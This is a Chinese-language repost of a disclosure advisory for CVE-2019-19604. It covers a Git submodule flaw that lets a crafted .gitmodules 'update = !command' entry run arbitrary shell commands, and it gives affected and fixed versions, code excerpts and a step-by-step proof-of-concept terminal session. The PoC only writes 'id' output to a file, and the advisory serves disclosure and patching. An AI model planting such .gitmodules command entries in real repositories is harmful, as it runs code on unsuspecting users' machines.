git submodule update操作可能導致執行.gitmodules檔案中定義的任意shell命令,
受影響的產品
- Git版本2.20.0至2.24.0
修復版本
- Git v2.24.1,v2.23.1,v2.22.2,v2.21.1,v2.20.2
披露時間表
- 2019-11-11 git-security郵件串列的初步報告
- 2019-12-10 Git v2.24.1,v2.23.1,v2.22.2,v2.21.1,v2.20.2發布
CVE編號
- CVE-2019-19604
細節
git-submodule 的手冊頁指出了子模塊的以下配置選項:
以下更新程序僅通過submodule..update配置變數可用:
自定義命令使用單個引數(超級專案中記錄的提交的sha1)的任意shell命令將被執行,當submodule..update設定為!command時,感嘆號后的其余部分為自定義命令,
可以.gitmodules在Git存盤庫中的檔案中定義此配置值,但是,--init使用該標志時,該設定將被覆寫,
該方法init_submodule中builtin/submodule--helper.c注意到了這一問題:
if (git_config_get_string(sb.buf, &upd) && sub->update_strategy.type != SM_UPDATE_UNSPECIFIED) { if (sub->update_strategy.type == SM_UPDATE_COMMAND) { fprintf(stderr, _("warning: command update mode suggested for submodule '%s'\n"), sub->name); upd = xstrdup("none"); } else上面的代碼將更新策略設定為none內.git/config包含子模塊的存盤庫,
僅當在--init沒有submodule.<name>.update策略的情況下呼叫,git submodule update且隨后update在內呼叫將策略設定為外部命令的后續呼叫時,該命令才會在特殊情況下執行.gitmodules,
開發實體
首先,我們準備一個存盤庫:
joern@hostname ~/tmp $ mkdir examplejoern@hostname ~/tmp $ cd example joern@hostname ~/tmp/example $ git init .Initialized empty Git repository in /home/joern/tmp/example/.git/joern@hostname ~/tmp/example $ git submodule add https://gitlab.com/joernchen/xxeserve.gitCloning into '/home/joern/tmp/example/xxeserve'...remote: Enumerating objects: 34, done.remote: Counting objects: 100% (34/34), done.remote: Compressing objects: 100% (29/29), done.remote: Total 34 (delta 14), reused 0 (delta 0)Unpacking objects: 100% (34/34), done.joern@hostname ~/tmp/example $ git commit -m "first commit"[master (root-commit) 9ed9add] first commit 2 files changed, 4 insertions(+) create mode 100644 .gitmodules create mode 160000 xxeserve到目前為止,關于存盤庫沒有什么特別的:
joern@hostname ~/tmp/example $ cat .gitmodules [submodule "xxeserve"] path = xxeserve url = https://gitlab.com/joernchen/xxeserve.git接下來,克隆存盤庫:
joern@hostname ~/tmp $ git clone --recurse-submodules example test Cloning into 'test'...done.Submodule 'xxeserve' (https://gitlab.com/joernchen/xxeserve.git) registered for path 'xxeserve'Cloning into '/home/joern/tmp/test/xxeserve'...remote: Enumerating objects: 34, done. remote: Counting objects: 100% (34/34), done. remote: Compressing objects: 100% (29/29), done. remote: Total 34 (delta 14), reused 0 (delta 0) Submodule path 'xxeserve': checked out 'c4a859fb16e2c65a1708d1c0a404f339191fd8e9'回到原始存盤庫,我們更改子模塊并在中引入命令.gitmodules:
joern@hostname ~/tmp/example $ echo -e '#!/bin/bash\x0aid>/tmp/poc.txt' > poc.shjoern@hostname ~/tmp/example $ echo ' update = !../poc.sh' >> .gitmodulesjoern@hostname ~/tmp/example $ chmod +x poc.sh joern@hostname ~/tmp/example $ cd xxeserve joern@hostname ~/tmp/example/xxeserve $ git checkout 0f5c204 Previous HEAD position was c4a859f Merge pull request #4 from mccabe615/masterHEAD is now at 0f5c204 Update README.mdjoern@hostname ~/tmp/example/xxeserve $ cd ..joern@hostname ~/tmp/example $ git add .joern@hostname ~/tmp/example $ git commit -m 'second commit'[master ec3abce] second commit 3 files changed, 4 insertions(+), 1 deletion(-) create mode 100755 poc.sh在克隆的存盤庫中,命令將在git pull之后運行git submodule update:
joern@hostname ~/tmp/test $ git pullremote: Enumerating objects: 6, done.remote: Counting objects: 100% (6/6), done.remote: Compressing objects: 100% (3/3), done.remote: Total 4 (delta 1), reused 0 (delta 0)Unpacking objects: 100% (4/4), done.From /home/joern/tmp/example + 113237f...ec3abce master -> origin/master (forced update)Updating 9ed9add..ec3abceFast-forward .gitmodules | 1 + poc.sh | 2 ++ xxeserve | 2 +- 3 files changed, 4 insertions(+), 1 deletion(-) create mode 100755 poc.sh joern@hostname ~/tmp/test $ git submodule updateSubmodule path 'xxeserve': '../poc.sh 0f5c2043db22ff091b800cb6c61e015492ad0885' joern@hostname ~/tmp/test $ cat /tmp/poc.txt uid=1000(joern) gid=1000(joern) groups=1000(joern),3(sys),90(network),98(power),991(lp),998(wheel) 外部參考
- Git發布公告
- https://about.gitlab.com/blog/2019/12/10/critical-security-release-gitlab-12-5-4-released/
- https://gitlab.com/gitlab-com/gl-security/disclosures/blob/master/003_git_submodule/advisory.md
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/49513.html
標籤:其他